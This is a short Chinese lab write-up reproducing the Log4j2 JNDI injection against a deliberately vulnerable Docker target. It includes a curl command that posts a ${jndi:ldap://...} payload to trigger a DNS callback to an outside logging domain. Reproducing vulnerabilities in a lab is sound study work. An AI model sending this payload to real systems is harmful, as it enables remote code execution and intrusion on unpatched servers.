log4j2 JNDI注入复现

admin 运维

复现现象:
这个镜像使用了log4j2用来当做靶机程序
1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09
2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名
在这里插入图片描述

4、执行一个post curl -X POST -F “payload=${jndi:ldap://king.xxxx.dns.1433.eu.org/exp}” http:/xxxxx:38080/hello

5、点击获取记录

这样说明log4j2 执行了上报dns记录。但是怎么利用这个漏洞呐?
在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>